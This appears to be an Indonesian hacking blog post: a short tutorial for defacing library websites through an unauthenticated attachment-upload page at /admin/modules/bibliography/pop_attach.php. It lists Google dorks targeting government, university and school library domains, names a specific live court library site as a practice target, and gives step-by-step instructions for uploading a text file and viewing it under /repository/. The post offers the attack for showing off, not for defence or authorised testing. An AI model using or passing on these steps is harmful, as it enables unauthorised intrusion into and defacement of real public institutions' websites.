Deface poc file Attachment Upload Repository

Wednesday, August 15, 2018 Add Comment

Deface poc file Attachment Upload Repository - oke gaessss kali ini gw bakal bagiin tutor cara deface poc file attachment, lumayan buat pamer ama temen, oce lgsung aja gan

               __    __          .__   
________ ____ |  | _|  | __ ____ |  |  
\___   // __ \|  |/ /  |/ // __ \|  |  
 /    /\  ___/|    <|    <\  ___/|  |__
/_____ \\___  >__|_ \__|_ \\___  >____/
      \/    \/     \/    \/    \/

bahan :
> Dork :- inurl:/admin/modules/bibliography/pop_attach.php
- pustaka.*.go.id
- pustaka.*.ac.id
- pustaka.*.sch.id
- pustaka.*.(isi dengan domain yang lain)

> Exploit : /admin/modules/bibliography/pop_attach.php

oke skrg langkah langkah nya :

nih w kasih live target buat belajar*

http://perpustakaan.pn-labuanbajo.go.id

1. dorking ke google dah tau kan caranya ? w cape ss nya, masukin dork nya di search engine google

2. klo dah nemu target, masukin Exploit nya
contoh : target.,com/admin/modules/bibliography/pop_attach.php

kek gini geng:
ntar bakal muncul gini kalo vuln:

3. sekarang u upload dah file nya, langsung upload aja

* format file nya .txt

contoh : kontol.txt

> klik unggah sekarang, yang ada di pojok kiri atas

4. sekarang kita akses file.txt yang tadi klean upload dengan cara :

- tambahin /repository/nama_file_kalian.txt

contoh : site.com/repository/jembut.txt

nah udah deh, ez sangad sebener nya, cma lu nya aja yg males gblg:v

Deface poc file Attachment Upload Repository

0 Response to "Deface poc file Attachment Upload Repository"

Post a Comment

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel